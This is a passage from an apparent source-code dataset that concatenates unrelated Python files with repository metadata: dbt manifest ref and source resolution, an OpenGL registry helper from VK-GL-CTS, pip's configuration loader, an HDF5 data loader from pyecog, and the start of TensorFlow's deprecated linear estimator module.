node,
target_name,
target_table_name,
disabled=disabled
)
def _check_resource_uniqueness(
manifest: Manifest,
config: RuntimeConfig,
) -> None:
names_resources: Dict[str, ManifestNode] = {}
alias_resources: Dict[str, ManifestNode] = {}
for resource, node in manifest.nodes.items():
if not node.is_relational:
continue
# appease mypy - sources aren't refable!
assert not isinstance(node, ParsedSourceDefinition)
name = node.name
# the full node name is really defined by the adapter's relation
relation_cls = get_relation_class_by_name(config.credentials.type)
relation = relation_cls.create_from(config=config, node=node)
full_node_name = str(relation)
existing_node = names_resources.get(name)
if existing_node is not None:
dbt.exceptions.raise_duplicate_resource_name(
existing_node, node
)
existing_alias = alias_resources.get(full_node_name)
if existing_alias is not None:
dbt.exceptions.raise_ambiguous_alias(
existing_alias, node, full_node_name
)
names_resources[name] = node
alias_resources[full_node_name] = node
def _warn_for_unused_resource_config_paths(
manifest: Manifest, config: RuntimeConfig
) -> None:
resource_fqns: Mapping[str, PathSet] = manifest.get_resource_fqns()
disabled_fqns: PathSet = frozenset(tuple(n.fqn) for n in manifest.disabled)
config.warn_for_unused_resource_config_paths(resource_fqns, disabled_fqns)
def _check_manifest(manifest: Manifest, config: RuntimeConfig) -> None:
_check_resource_uniqueness(manifest, config)
_warn_for_unused_resource_config_paths(manifest, config)
# This is just used in test cases
def _load_projects(config, paths):
for path in paths:
try:
project = config.new_project(path)
except dbt.exceptions.DbtProjectError as e:
raise dbt.exceptions.DbtProjectError(
'Failed to read package at {}: {}'
.format(path, e)
)
else:
yield project.project_name, project
def _get_node_column(node, column_name):
"""Given a ParsedNode, add some fields that might be missing. Return a
reference to the dict that refers to the given column, creating it if
it doesn't yet exist.
"""
if column_name in node.columns:
column = node.columns[column_name]
else:
        column = ColumnInfo(name=column_name)
        node.columns[column_name] = column
return column
DocsContextCallback = Callable[
[Union[ParsedNode, ParsedSourceDefinition]],
Dict[str, Any]
]
# node and column descriptions
def _process_docs_for_node(
context: Dict[str, Any],
node: ManifestNode,
):
node.description = get_rendered(node.description, context)
for column_name, column in node.columns.items():
column.description = get_rendered(column.description, context)
# source and table descriptions, column descriptions
def _process_docs_for_source(
context: Dict[str, Any],
source: ParsedSourceDefinition,
):
table_description = source.description
source_description = source.source_description
table_description = get_rendered(table_description, context)
source_description = get_rendered(source_description, context)
source.description = table_description
source.source_description = source_description
for column in source.columns.values():
column_desc = column.description
column_desc = get_rendered(column_desc, context)
column.description = column_desc
# macro argument descriptions
def _process_docs_for_macro(
context: Dict[str, Any], macro: ParsedMacro
) -> None:
macro.description = get_rendered(macro.description, context)
for arg in macro.arguments:
arg.description = get_rendered(arg.description, context)
# exposure descriptions
def _process_docs_for_exposure(
context: Dict[str, Any], exposure: ParsedExposure
) -> None:
exposure.description = get_rendered(exposure.description, context)
def _process_refs_for_exposure(
manifest: Manifest, current_project: str, exposure: ParsedExposure
):
"""Given a manifest and a exposure in that manifest, process its refs"""
for ref in exposure.refs:
target_model: Optional[Union[Disabled, ManifestNode]] = None
target_model_name: str
target_model_package: Optional[str] = None
if len(ref) == 1:
target_model_name = ref[0]
elif len(ref) == 2:
target_model_package, target_model_name = ref
else:
raise dbt.exceptions.InternalException(
f'Refs should always be 1 or 2 arguments - got {len(ref)}'
)
target_model = manifest.resolve_ref(
target_model_name,
target_model_package,
current_project,
exposure.package_name,
)
if target_model is None or isinstance(target_model, Disabled):
# This may raise. Even if it doesn't, we don't want to add
# this exposure to the graph b/c there is no destination exposure
invalid_ref_fail_unless_test(
exposure, target_model_name, target_model_package,
disabled=(isinstance(target_model, Disabled))
)
continue
target_model_id = target_model.unique_id
exposure.depends_on.nodes.append(target_model_id)
manifest.update_exposure(exposure)
def _process_refs_for_node(
manifest: Manifest, current_project: str, node: ManifestNode
):
"""Given a manifest and a node in that manifest, process its refs"""
for ref in node.refs:
target_model: Optional[Union[Disabled, ManifestNode]] = None
target_model_name: str
target_model_package: Optional[str] = None
if len(ref) == 1:
target_model_name = ref[0]
elif len(ref) == 2:
target_model_package, target_model_name = ref
else:
raise dbt.exceptions.InternalException(
f'Refs should always be 1 or 2 arguments - got {len(ref)}'
)
target_model = manifest.resolve_ref(
target_model_name,
target_model_package,
current_project,
node.package_name,
)
if target_model is None or isinstance(target_model, Disabled):
# This may raise. Even if it doesn't, we don't want to add
# this node to the graph b/c there is no destination node
node.config.enabled = False
invalid_ref_fail_unless_test(
node, target_model_name, target_model_package,
disabled=(isinstance(target_model, Disabled))
)
continue
target_model_id = target_model.unique_id
node.depends_on.nodes.append(target_model_id)
# TODO: I think this is extraneous, node should already be the same
# as manifest.nodes[node.unique_id] (we're mutating node here, not
# making a new one)
# Q: could we stop doing this?
manifest.update_node(node)
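# Resolution sketch (assumed values): a model body containing
# {{ ref('my_model') }} parses to node.refs == [['my_model']], while
# {{ ref('other_pkg', 'my_model') }} parses to [['other_pkg', 'my_model']];
# each resolved target's unique_id is appended to node.depends_on.nodes.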
def _process_sources_for_exposure(
manifest: Manifest, current_project: str, exposure: ParsedExposure
):
target_source: Optional[Union[Disabled, ParsedSourceDefinition]] = None
for source_name, table_name in exposure.sources:
target_source = manifest.resolve_source(
source_name,
table_name,
current_project,
exposure.package_name,
)
if target_source is None or isinstance(target_source, Disabled):
invalid_source_fail_unless_test(
exposure,
source_name,
table_name,
disabled=(isinstance(target_source, Disabled))
)
continue
target_source_id = target_source.unique_id
exposure.depends_on.nodes.append(target_source_id)
manifest.update_exposure(exposure)
def _process_sources_for_node(
manifest: Manifest, current_project: str, node: ManifestNode
):
target_source: Optional[Union[Disabled, ParsedSourceDefinition]] = None
for source_name, table_name in node.sources:
target_source = manifest.resolve_source(
source_name,
table_name,
current_project,
node.package_name,
)
if target_source is None or isinstance(target_source, Disabled):
            # this follows the same pattern as refs
node.config.enabled = False
invalid_source_fail_unless_test(
node,
source_name,
table_name,
disabled=(isinstance(target_source, Disabled))
)
continue
target_source_id = target_source.unique_id
node.depends_on.nodes.append(target_source_id)
manifest.update_node(node)
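# Source resolution sketch (assumed values): {{ source('raw', 'orders') }}
# parses to node.sources == [['raw', 'orders']]; on success the source's
# unique_id is appended to node.depends_on.nodes, while an unresolved source
# disables the node (tests only warn instead of raising).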
# This is called in task.rpc.sql_commands when a "dynamic" node is
# created in the manifest, in 'add_refs'
def process_macro(
config: RuntimeConfig, manifest: Manifest, macro: ParsedMacro
) -> None:
ctx = generate_runtime_docs(
config,
macro,
manifest,
config.project_name,
)
_process_docs_for_macro(ctx, macro)
# This is called in task.rpc.sql_commands when a "dynamic" node is
# created in the manifest, in 'add_refs'
def process_node(
config: RuntimeConfig, manifest: Manifest, node: ManifestNode
):
_process_sources_for_node(
manifest, config.project_name, node
)
_process_refs_for_node(manifest, config.project_name, node)
ctx = generate_runtime_docs(config, node, manifest, config.project_name)
_process_docs_for_node(ctx, node)
| 40.2453 | 99 | 0.641411 |
09d0b237ce880a87f966e823c7b5547ac8dcffa2 | 7,850 | py | Python | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015-2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import re
import sys
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
import khr_util.format
import khr_util.registry
import khr_util.registry_cache
SCRIPTS_DIR = os.path.dirname(__file__)
OPENGL_DIR = os.path.normpath(os.path.join(SCRIPTS_DIR, "..", "..", "framework", "opengl"))
EGL_DIR = os.path.normpath(os.path.join(SCRIPTS_DIR, "..", "..", "framework", "egl"))
OPENGL_INC_DIR = os.path.join(OPENGL_DIR, "wrapper")
GL_SOURCE = khr_util.registry_cache.RegistrySource(
"https://raw.githubusercontent.com/KhronosGroup/OpenGL-Registry",
"xml/gl.xml",
"b7aee529f02340247e45621e9dbd054817d39c71",
"9a5e5d6b8b45df8d8f95c56f8fc0bc9ab99e675f43a9509aa2b222bcc9ed715a")
EXTENSIONS = [
'GL_KHR_texture_compression_astc_ldr',
'GL_KHR_blend_equation_advanced',
'GL_KHR_blend_equation_advanced_coherent',
'GL_KHR_debug',
'GL_EXT_robustness',
'GL_KHR_robustness',
'GL_KHR_no_error',
'GL_KHR_parallel_shader_compile',
'GL_EXT_bgra',
'GL_EXT_geometry_point_size',
'GL_EXT_tessellation_shader',
'GL_EXT_geometry_shader',
'GL_EXT_texture_buffer',
'GL_EXT_texture_filter_anisotropic',
'GL_EXT_texture_cube_map_array',
'GL_EXT_texture_snorm',
'GL_EXT_primitive_bounding_box',
'GL_EXT_texture_compression_s3tc',
'GL_EXT_texture_type_2_10_10_10_REV',
'GL_EXT_clip_control',
'GL_EXT_copy_image',
'GL_EXT_depth_bounds_test',
'GL_EXT_direct_state_access',
'GL_EXT_draw_buffers_indexed',
'GL_EXT_draw_elements_base_vertex',
'GL_EXT_direct_state_access',
'GL_EXT_read_format_bgra',
'GL_EXT_texture_storage',
'GL_EXT_texture_sRGB_decode',
'GL_EXT_texture_border_clamp',
'GL_EXT_texture_sRGB_R8',
'GL_EXT_texture_sRGB_RG8',
'GL_EXT_debug_marker',
'GL_EXT_polygon_offset_clamp',
'GL_IMG_texture_compression_pvrtc',
'GL_OES_EGL_image',
'GL_OES_EGL_image_external',
'GL_OES_compressed_ETC1_RGB8_texture',
'GL_OES_compressed_paletted_texture',
'GL_OES_required_internalformat',
'GL_OES_packed_depth_stencil',
'GL_OES_texture_3D',
'GL_OES_texture_half_float',
'GL_OES_texture_storage_multisample_2d_array',
'GL_OES_sample_shading',
'GL_OES_standard_derivatives',
'GL_OES_stencil1',
'GL_OES_stencil4',
'GL_OES_surfaceless_context',
'GL_OES_mapbuffer',
'GL_OES_vertex_array_object',
'GL_OES_viewport_array',
'GL_ARB_clip_control',
'GL_ARB_buffer_storage',
'GL_ARB_compute_shader',
'GL_ARB_draw_indirect',
'GL_ARB_draw_instanced',
'GL_ARB_draw_elements_base_vertex',
'GL_ARB_direct_state_access',
'GL_ARB_get_program_binary',
'GL_ARB_gl_spirv',
'GL_ARB_indirect_parameters',
'GL_ARB_internalformat_query',
'GL_ARB_instanced_arrays',
'GL_ARB_multi_draw_indirect',
'GL_ARB_parallel_shader_compile',
'GL_ARB_program_interface_query',
'GL_ARB_separate_shader_objects',
'GL_ARB_shader_ballot',
'GL_ARB_shader_image_load_store',
'GL_ARB_shader_viewport_layer_array',
'GL_ARB_sparse_buffer',
'GL_ARB_sparse_texture',
'GL_ARB_spirv_extensions',
'GL_ARB_tessellation_shader',
'GL_ARB_texture_barrier',
'GL_ARB_texture_filter_minmax',
'GL_ARB_texture_gather',
'GL_ARB_texture_storage',
'GL_ARB_texture_storage_multisample',
'GL_ARB_texture_multisample',
'GL_ARB_texture_view',
'GL_ARB_transform_feedback2',
'GL_ARB_transform_feedback3',
'GL_ARB_transform_feedback_instanced',
'GL_ARB_transform_feedback_overflow_query',
'GL_ARB_vertex_array_bgra',
'GL_ARB_vertex_attrib_64bit',
'GL_ARB_vertex_attrib_binding',
'GL_NV_deep_texture3D',
'GL_NV_gpu_multicast',
'GL_NV_internalformat_sample_query',
'GL_NVX_cross_process_interop',
'GL_OES_draw_elements_base_vertex',
'GL_OVR_multiview',
'GL_OVR_multiview_multisampled_render_to_texture',
]
def getGLRegistry ():
return khr_util.registry_cache.getRegistry(GL_SOURCE)
def getHybridInterface (stripAliasedExtCommands = True):
# This is a bit awkward, since we have to create a strange hybrid
# interface that includes both GL and ES features and extensions.
registry = getGLRegistry()
	glFeatures = registry.getFeatures('gl')
	esFeatures = registry.getFeatures('gles2')
	spec = khr_util.registry.InterfaceSpec()
	for feature in glFeatures:
		spec.addFeature(feature, 'gl', 'core')
	for feature in esFeatures:
		spec.addFeature(feature, 'gles2')
for extName in EXTENSIONS:
extension = registry.extensions[extName]
# Add all extensions using the ES2 api, but force even non-ES2
# extensions to be included.
spec.addExtension(extension, 'gles2', 'core', force=True)
iface = khr_util.registry.createInterface(registry, spec, 'gles2')
if stripAliasedExtCommands:
# Remove redundant extension commands that are already provided by core.
strippedCmds = []
for command in iface.commands:
if command.alias == None:
strippedCmds.append(command)
iface.commands = strippedCmds
return iface
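# Usage sketch (not part of the original script; assumes the cached registry
# can be fetched): compare the hybrid interface with and without alias
# stripping.
def _demoHybridInterface():
	stripped = getHybridInterface()
	raw = getHybridInterface(stripAliasedExtCommands=False)
	print("commands: %d stripped / %d raw" % (len(stripped.commands), len(raw.commands)))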
def versionCheck(version):
	# False (no version requested) counts as "old"; strings compare
	# lexicographically against "3.2".
	if type(version) is bool:
		if version == False:
			return True
	if type(version) is str:
		return version < "3.2"
	raise Exception("Version check failed")
def getInterface (registry, api, version=None, profile=None, **kwargs):
spec = khr_util.registry.spec(registry, api, version, profile, **kwargs)
if api == 'gl' and profile == 'core' and versionCheck(version):
gl32 = registry.features['GL_VERSION_3_2']
for eRemove in gl32.xpath('remove'):
spec.addComponent(eRemove)
return khr_util.registry.createInterface(registry, spec, api)
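# Illustration of the 'core' special case above (hypothetical helper): for a
# GL version below 3.2, versionCheck is True and the GL_VERSION_3_2 <remove>
# blocks are replayed onto the spec.
def _demoCoreInterface():
	registry = getGLRegistry()
	return getInterface(registry, 'gl', version="3.1", profile='core')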
def getVersionToken (api, version):
prefixes = { 'gles2': "ES", 'gl': "GL" }
return prefixes[api] + version.replace(".", "")
def genCommandList(iface, renderCommand, directory, filename, align=False):
lines = map(renderCommand, iface.commands)
lines = filter(lambda l: l != None, lines)
if align:
lines = indentLines(lines)
writeInlFile(os.path.join(directory, filename), lines)
def genCommandLists(registry, renderCommand, check, directory, filePattern, align=False):
for eFeature in registry.features:
api = eFeature.get('api')
version = eFeature.get('number')
profile = check(api, version)
if profile is True:
profile = None
elif profile is False:
continue
iface = getInterface(registry, api, version=version, profile=profile)
filename = filePattern % getVersionToken(api, version)
genCommandList(iface, renderCommand, directory, filename, align)
def getFunctionTypeName (funcName):
return "%sFunc" % funcName
def getFunctionMemberName (funcName):
assert funcName[:2] == "gl"
if funcName[:5] == "glEGL":
# Otherwise we end up with gl.eGLImage...
return "egl%s" % funcName[5:]
else:
return "%c%s" % (funcName[2].lower(), funcName[3:])
INL_HEADER = khr_util.format.genInlHeader("Khronos GL API description (gl.xml)", GL_SOURCE.getRevision())
def writeInlFile (filename, source):
khr_util.format.writeInlFile(filename, INL_HEADER, source)
# Aliases from khr_util.common
indentLines = khr_util.format.indentLines
normalizeConstant = khr_util.format.normalizeConstant
commandParams = khr_util.format.commandParams
commandArgs = khr_util.format.commandArgs
| 32.572614 | 105 | 0.759363 |
01b68abf1c2fa93f151142cc9ee129f042097ad1 | 4,107 | py | Python | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | null | null | null | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | null | null | null | pip/configuration.py | jonparrott/pip | 9c037803197b05bb722223c2f5deffcbb7f4b0c4 | [
"MIT"
] | 1 | 2020-12-18T10:39:35.000Z | 2020-12-18T10:39:35.000Z | """Configuration management setup
"""
import os
import re
import sys
from pip._vendor.six.moves import configparser
from pip.locations import (
config_basename, legacy_config_file, running_under_virtualenv,
site_config_files
)
from pip.utils import appdirs
_environ_prefix_re = re.compile(r"^PIP_", re.I)
class Configuration(object):
"""Handles the loading of configuration files and providing an interface to
accessing data within them.
"""
def __init__(self, isolated):
self._configparser = configparser.RawConfigParser()
self._config = {}
self.isolated = isolated
def load(self, section):
"""Loads configuration
"""
self._load_config_files(section)
if not self.isolated:
self._load_environment_vars()
def items(self):
"""Returns key-value pairs like dict.values() representing the loaded
configuration
"""
return self._config.items()
def _load_config_files(self, section):
"""Loads configuration from configuration files
"""
files = self._get_config_files()
if files:
self._configparser.read(files)
        for name in ('global', section):
            self._config.update(
                self._normalize_keys(self._get_config_section(name))
            )
def _load_environment_vars(self):
"""Loads configuration from environment variables
"""
self._config.update(self._normalize_keys(self._get_environ_vars()))
def _normalize_keys(self, items):
"""Return a config dictionary with normalized keys regardless of
whether the keys were specified in environment variables or in config
files"""
normalized = {}
for key, val in items:
key = key.replace('_', '-')
if key.startswith('--'):
key = key[2:] # only prefer long opts
normalized[key] = val
return normalized
def _get_environ_vars(self):
"""Returns a generator with all environmental vars with prefix PIP_"""
for key, val in os.environ.items():
if _environ_prefix_re.search(key):
yield (_environ_prefix_re.sub("", key).lower(), val)
def _get_config_files(self):
"""Returns configuration files in a defined order.
The order is that the first files are overridden by the latter files;
like what ConfigParser expects.
"""
# the files returned by this method will be parsed in order with the
# first files listed being overridden by later files in standard
# ConfigParser fashion
config_file = os.environ.get('PIP_CONFIG_FILE', False)
if config_file == os.devnull:
return []
# at the base we have any site-wide configuration
files = list(site_config_files)
# per-user configuration next
if not self.isolated:
if config_file and os.path.exists(config_file):
files.append(config_file)
else:
# This is the legacy config file, we consider it to be a lower
# priority than the new file location.
files.append(legacy_config_file)
# This is the new config file, we consider it to be a higher
# priority than the legacy file.
files.append(
os.path.join(
appdirs.user_config_dir("pip"),
config_basename,
)
)
        # finally, virtualenv configuration, which trumps everything else
if running_under_virtualenv():
venv_config_file = os.path.join(
sys.prefix,
config_basename,
)
if os.path.exists(venv_config_file):
files.append(venv_config_file)
return files
def _get_config_section(self, section):
if self._configparser.has_section(section):
return self._configparser.items(section)
return []
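# Illustrative sketch (not part of pip; PIP_DEFAULT_TIMEOUT is a real pip
# option, the value is made up): _get_environ_vars strips the "PIP_" prefix
# and lowercases, then _normalize_keys swaps underscores for dashes.
def _demo_configuration():
    os.environ["PIP_DEFAULT_TIMEOUT"] = "60"
    config = Configuration(isolated=False)
    config.load("install")
    return dict(config.items()).get("default-timeout")  # "60"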
| 32.338583 | 79 | 0.60823 |
1d109ee9be7eccbded7febf27adcb7733b6c04e2 | 3,990 | py | Python | pyecog/ndf/h5loader.py | mikailweston/pyecog | 9a1674ec95b63ad9aa0a2d3aedc1a74be6441446 | [
"MIT"
] | 10 | 2016-09-07T16:01:39.000Z | 2019-03-26T11:14:28.000Z | pyecog/ndf/h5loader.py | mikailweston/pyecog | 9a1674ec95b63ad9aa0a2d3aedc1a74be6441446 | [
"MIT"
] | 54 | 2016-11-21T14:41:52.000Z | 2022-03-18T08:41:11.000Z | pyecog/ndf/h5loader.py | jcornford/pyecog | 356439bd5e3c50fd0cd74eef90a897bd41363920 | [
"MIT"
] | 5 | 2016-10-11T14:14:44.000Z | 2017-08-02T11:45:48.000Z | import h5py
import numpy as np
import matplotlib.pyplot as plt
import time
import sys
import pandas as pd
class H5Dataset():
"""
This is initially to just load up the h5 file converted by the ndf loader
# todo everything should be simplified into one dictionary...
"""
def __init__(self,fpath, mcode_id_str):
self.fpath = fpath
self.mcode_id_str = mcode_id_str
self.h5dataset = None
self.data = None
self.time = None
self.features_df = None
self.features = None
self.fs = None
self.mode_std = None
self.feature_col_labels = None
self._load_data()
def _load_data(self):
with h5py.File(self.fpath, 'r+') as f:
tid_dataset = f[self.mcode_id_str]
for member in tid_dataset.keys():
if str(member) == 'data':
self.data = np.array(tid_dataset['data'])
if str(member) == 'time':
self.time = np.array(tid_dataset['time'])
if str(member) == 'features':
self.features = np.array(tid_dataset['features'])
for att_key in tid_dataset.attrs.keys():
                # ['fs', 'tid', 'time_arr_info_dict', 'resampled', 'col_names', 'mode_std']
if str(att_key) == 'col_names':
self.feature_col_labels = list(tid_dataset.attrs['col_names'])
if str(att_key) == 'fs':
self.fs = tid_dataset.attrs['fs']
if str(att_key) == 'mode_std':
self.mode_std = tid_dataset.attrs['mode_std']
if self.time is None:
time_arr_info_dict = eval(tid_dataset.attrs['time_arr_info_dict'])
self.time = np.linspace(time_arr_info_dict['min_t'],
time_arr_info_dict['max_t'],
num= time_arr_info_dict['max_t'] * time_arr_info_dict['fs'])
if self.features is not None:
self.features_df = pd.DataFrame(self.features, columns = [b.decode("utf-8") for b in self.feature_col_labels])
def plot(self):
print ('Placeholder: Plot method to implement!')
# have indexing argument...
class H5File():
'''
Class for reading h5 files:
Use transmitter id to index which transmitter you want to access:
    h5obj = H5File(path_to_h5_file)
h5obj[2] # for transmitter 2
Attributes available are:
- h5obj[2].time
- h5obj[2].data
# to do - first test that other modules dont treat as dictionary before finalising this.
'''
def __init__(self, filepath):
self.filepath = filepath
with h5py.File(self.filepath, 'r+') as f:
if sys.version_info < (3,):
self.attributes = dict(f.attrs.iteritems())
else:
self.attributes = dict(f.attrs.items())
# eg. {'t_ids': array([ 1, 2 ]), 'fs_dict': '{1: 512.0, 2: 512.0, 'num_channels': 2}
self.attributes['Mcode'] = list(f.keys())[0] # list in case there is more than one M1etc
def __repr__(self):
return 'Better formatting coming soon... \nAttributes:'+str(self.attributes)
def __getitem__(self, tid):
assert tid in self.attributes['t_ids'], 'ERROR: Invalid tid for file'
tid_dataset = H5Dataset(self.filepath, self.attributes['Mcode']+'/'+str(tid))
        # again, clumsy duplication going on here - just build one master dict
group_contents = {}
group_contents['data'] = tid_dataset.data
group_contents['time'] = tid_dataset.time
group_contents['features'] = tid_dataset.features
group_contents['feature_col_names'] = tid_dataset.feature_col_labels
group_contents['mode_std'] = tid_dataset.mode_std
group_contents['fs'] = tid_dataset.fs
group_contents['features_df'] = tid_dataset.features_df
return group_contents
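# Usage sketch mirroring the H5File docstring (file path and transmitter id
# are hypothetical):
def _demo_h5file(fpath='example.h5', tid=2):
    h5obj = H5File(fpath)
    contents = h5obj[tid]  # dict with 'data', 'time', 'features', 'fs', ...
    print(contents['data'].shape, contents['time'].shape, contents['fs'])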
| 37.641509 | 127 | 0.590727 |
c62f3f26135ec6d3b8fa1b4bfa873ab712356c11 | 39,969 | py | Python | Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | JustinACoder/H22-GR3-UnrealAI | 361eb9ef1147f8a2991e5f98c4118cd823184adf | [
"MIT"
] | 6 | 2022-02-04T18:12:24.000Z | 2022-03-21T23:57:12.000Z | Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings | 1fa4cd6a566c8745f455fc3d2273208f21f88ced | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/tensorflow/contrib/learn/python/learn/estimators/linear.py | shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings | 1fa4cd6a566c8745f455fc3d2273208f21f88ced | [
"bzip2-1.0.6"
] | 1 | 2022-02-08T03:53:23.000Z | 2022-02-08T03:53:23.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import six
from tensorflow.contrib import layers
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework import deprecated_arg_values
from tensorflow.contrib.layers.python.layers import feature_column
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.utils import export
from tensorflow.contrib.linear_optimizer.python import sdca_optimizer
from tensorflow.python.feature_column import feature_column as fc_core
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training as train
from tensorflow.python.training import training_util
# The default learning rate of 0.2 is a historical artifact of the initial
# implementation, but seems a reasonable choice.
_LEARNING_RATE = 0.2
def _get_optimizer(spec):
if isinstance(spec, six.string_types):
return layers.OPTIMIZER_CLS_NAMES[spec](
learning_rate=_LEARNING_RATE)
elif callable(spec):
return spec()
return spec
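# Sketch of the three spec forms _get_optimizer accepts (a key from
# layers.OPTIMIZER_CLS_NAMES, a zero-arg callable, or a ready instance):
def _demo_get_optimizer():
  by_name = _get_optimizer("Ftrl")  # built with the default _LEARNING_RATE
  by_callable = _get_optimizer(lambda: train.FtrlOptimizer(learning_rate=0.1))
  by_instance = _get_optimizer(train.FtrlOptimizer(learning_rate=0.1))
  return by_name, by_callable, by_instance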
# TODO(ispir): Remove this function by fixing '_infer_model' with single outputs
# and as_iterable case.
def _as_iterable(preds, output):
for pred in preds:
yield pred[output]
def _add_bias_column(feature_columns, columns_to_tensors, bias_variable,
columns_to_variables):
"""Adds a fake bias feature column filled with all 1s."""
# TODO(b/31008490): Move definition to a common constants place.
bias_column_name = "tf_virtual_bias_column"
  if any(col.name == bias_column_name for col in feature_columns):
raise ValueError("%s is a reserved column name." % bias_column_name)
if not feature_columns:
raise ValueError("feature_columns can't be empty.")
# Loop through input tensors until we can figure out batch_size.
batch_size = None
for column in columns_to_tensors.values():
if isinstance(column, tuple):
column = column[0]
if isinstance(column, sparse_tensor.SparseTensor):
shape = tensor_util.constant_value(column.dense_shape)
if shape is not None:
batch_size = shape[0]
break
else:
batch_size = array_ops.shape(column)[0]
break
if batch_size is None:
raise ValueError("Could not infer batch size from input features.")
bias_column = layers.real_valued_column(bias_column_name)
columns_to_tensors[bias_column] = array_ops.ones([batch_size, 1],
dtype=dtypes.float32)
columns_to_variables[bias_column] = [bias_variable]
def _linear_model_fn(features, labels, mode, params, config=None):
"""A model_fn for linear models that use a gradient-based optimizer.
Args:
features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance.
* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: string, `Optimizer` object, or callable that defines the
optimizer to use for training. If `None`, will use a FTRL optimizer.
* gradient_clip_norm: A float > 0. If provided, gradients are
clipped to their global norm with this clipping ratio.
* joint_weights: If True, the weights for all columns will be stored in a
single (possibly partitioned) variable. It's more efficient, but it's
incompatible with SDCAOptimizer, and requires all feature columns are
sparse and use the 'sum' combiner.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If mode is not any of the `ModeKeys`.
"""
head = params["head"]
feature_columns = params["feature_columns"]
optimizer = params.get("optimizer") or _get_default_optimizer(feature_columns)
gradient_clip_norm = params.get("gradient_clip_norm", None)
num_ps_replicas = config.num_ps_replicas if config else 0
joint_weights = params.get("joint_weights", False)
if not isinstance(features, dict):
features = {"": features}
parent_scope = "linear"
partitioner = partitioned_variables.min_max_variable_partitioner(
max_partitions=num_ps_replicas,
min_slice_size=64 << 20)
with variable_scope.variable_scope(
parent_scope,
values=tuple(six.itervalues(features)),
partitioner=partitioner) as scope:
if all([isinstance(fc, feature_column._FeatureColumn) # pylint: disable=protected-access
for fc in feature_columns]):
if joint_weights:
layer_fn = layers.joint_weighted_sum_from_feature_columns
else:
layer_fn = layers.weighted_sum_from_feature_columns
logits, _, _ = layer_fn(
columns_to_tensors=features,
feature_columns=feature_columns,
num_outputs=head.logits_dimension,
weight_collections=[parent_scope],
scope=scope)
else:
logits = fc_core.linear_model(
features=features,
feature_columns=feature_columns,
units=head.logits_dimension,
weight_collections=[parent_scope])
def _train_op_fn(loss):
global_step = training_util.get_global_step()
my_vars = ops.get_collection(parent_scope)
grads = gradients.gradients(loss, my_vars)
if gradient_clip_norm:
grads, _ = clip_ops.clip_by_global_norm(grads, gradient_clip_norm)
return (_get_optimizer(optimizer).apply_gradients(
zip(grads, my_vars), global_step=global_step))
return head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=_train_op_fn,
logits=logits)
def sdca_model_fn(features, labels, mode, params):
"""A model_fn for linear models that use the SDCA optimizer.
Args:
features: A dict of `Tensor` keyed by column name.
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance. Type must be one of `_BinarySvmHead`,
`_RegressionHead` or `_BinaryLogisticHead`.
